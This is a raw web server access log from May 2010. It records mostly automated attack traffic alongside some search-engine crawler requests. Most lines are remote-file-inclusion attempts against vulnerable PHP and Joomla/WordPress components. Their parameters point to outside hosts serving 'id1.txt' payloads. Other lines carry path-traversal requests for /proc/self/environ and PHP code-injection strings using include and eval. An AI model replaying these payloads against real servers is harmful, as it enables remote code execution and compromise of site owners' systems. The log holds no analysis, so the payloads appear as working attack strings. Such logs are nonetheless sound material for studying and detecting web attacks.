195.9.14.148 - - [01/May/2010:07:44:32 -0500] "GET /errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
99.39.2.249 - - [01/May/2010:07:44:57 -0500] "GET /logs/access_log.1219708800//modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.834"
99.39.2.249 - - [01/May/2010:07:44:57 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.834"
99.39.2.249 - - [01/May/2010:07:44:57 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
92.241.190.214 - - [01/May/2010:07:47:33 -0500] "GET //components/com_flyspray/startdown.php?file=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [01/May/2010:07:47:33 -0500] "GET /logs/access_log.1270598400//components/com_flyspray/startdown.php?file=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [01/May/2010:07:47:33 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
213.251.189.201 - - [01/May/2010:07:47:53 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.251.189.201 - - [01/May/2010:07:47:53 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.251.189.201 - - [01/May/2010:07:47:53 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
213.251.189.201 - - [01/May/2010:07:47:57 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.194.116 - - [01/May/2010:07:50:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
77.92.94.85 - - [01/May/2010:07:50:50 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.813"
207.46.194.116 - - [01/May/2010:07:50:50 -0500] "GET /costume/costume94%20copy.JPG HTTP/1.1" 200 15637 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
77.92.94.85 - - [01/May/2010:07:50:50 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.813"
207.46.194.116 - - [01/May/2010:07:50:50 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
124.115.6.16 - - [01/May/2010:07:51:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Sosospider+(+http://help.soso.com/webspider.htm)"
213.251.189.201 - - [01/May/2010:07:52:37 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.251.189.201 - - [01/May/2010:07:52:41 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:07:55:09 -0500] "GET /logs/access_log.1270166400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.177.33.14 - - [01/May/2010:07:55:59 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:55:59 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:55:59 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:00 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:00 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:00 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:30 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:30 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:30 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:30 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:30 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:30 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:34 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:34 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:34 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:42 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:42 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:56:42 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:57:18 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:57:20 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:57:52 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:57:54 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:58:03 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:07:58:04 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
119.235.18.81 - - [01/May/2010:07:59:57 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
119.235.18.81 - - [01/May/2010:07:59:57 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
119.235.18.81 - - [01/May/2010:07:59:57 -0500] "GET /logs/access_log.1270684800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
119.235.18.81 - - [01/May/2010:08:00:54 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.199.45 - - [01/May/2010:08:01:24 -0500] "GET /logs/access_log.1245369600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.9.14.148 - - [01/May/2010:08:02:39 -0500] "GET /logs/access_log.1219708800/phphtml.php?htmlclass_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:08:02:39 -0500] "GET /logs/phphtml.php?htmlclass_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:08:02:39 -0500] "GET /phphtml.php?htmlclass_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.46.204.230 - - [01/May/2010:08:03:55 -0500] "GET /logs/access_log.1170547200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.67.220 - - [01/May/2010:08:08:10 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.121.67.220 - - [01/May/2010:08:08:11 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.121.67.220 - - [01/May/2010:08:09:09 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.121.67.220 - - [01/May/2010:08:09:10 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
88.191.94.188 - - [01/May/2010:08:09:14 -0500] "GET /logs/access_log.1268611200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:08:09:14 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:08:09:14 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:08:09:52 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:08:09:52 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:08:09:52 -0500] "GET /logs/access_log.1268611200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.46.199.242 - - [01/May/2010:08:18:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.242 - - [01/May/2010:08:18:38 -0500] "GET /artwork/icefishing_diorama.png HTTP/1.1" 200 49088 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
69.175.39.162 - - [01/May/2010:08:19:49 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:49 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:49 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:55 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:55 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:55 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:55 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:55 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:19:55 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:20:16 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:20:16 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:20:16 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:20:54 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:21:00 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:21:12 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:21:27 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:08:21:42 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.201 - - [01/May/2010:08:21:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.184 - - [01/May/2010:08:22:54 -0500] "GET /logs/access_log.1207180800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.139 - - [01/May/2010:08:26:23 -0500] "GET /costume/thmb2.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.39.162 - - [01/May/2010:08:27:12 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:27:12 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:27:12 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:27:19 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:27:19 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:27:19 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.13.133 - - [01/May/2010:08:28:24 -0500] "GET /logs/access_log.1236988800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.48 - - [01/May/2010:08:31:24 -0500] "GET /logs/access_log.1183507200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.39.162 - - [01/May/2010:08:32:33 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:32:33 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:32:33 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:32:38 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:32:53 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:33:27 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:33:42 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:33:42 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:33:42 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:34:23 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:34:23 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:34:23 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:34:28 -0500] "GET //wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:34:28 -0500] "GET /logs/access_log.1270512000//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:34:28 -0500] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:34:53 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:35:51 -0500] "GET /logs/access_log.1270512000//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:35:51 -0500] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:35:51 -0500] "GET //wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:35:59 -0500] "GET /logs/access_log.1270512000//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:35:59 -0500] "GET //wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:08:35:59 -0500] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:36:07 -0500] "GET /logs/access_log.1270512000//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:36:07 -0500] "GET //wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:36:07 -0500] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:36:47 -0500] "GET //wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:36:47 -0500] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:36:47 -0500] "GET /logs/access_log.1270512000//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:38:28 -0500] "GET /logs/access_log.1270512000%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:08:38:43 -0500] "GET /logs/access_log.1270512000%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:39:49 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
208.115.111.248 - - [01/May/2010:08:40:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
211.232.85.247 - - [01/May/2010:08:40:25 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
